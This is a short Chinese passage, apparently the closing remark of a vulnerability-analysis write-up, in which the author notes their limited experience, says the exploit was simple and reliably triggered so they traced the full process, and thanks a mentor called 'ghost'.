自身分析漏洞的经验不多,由于漏洞的利用过程不算复杂加上几乎稳定触发所以自己还算完整地把整个流程跟了一遍,最后还要感谢ghost师傅的指点。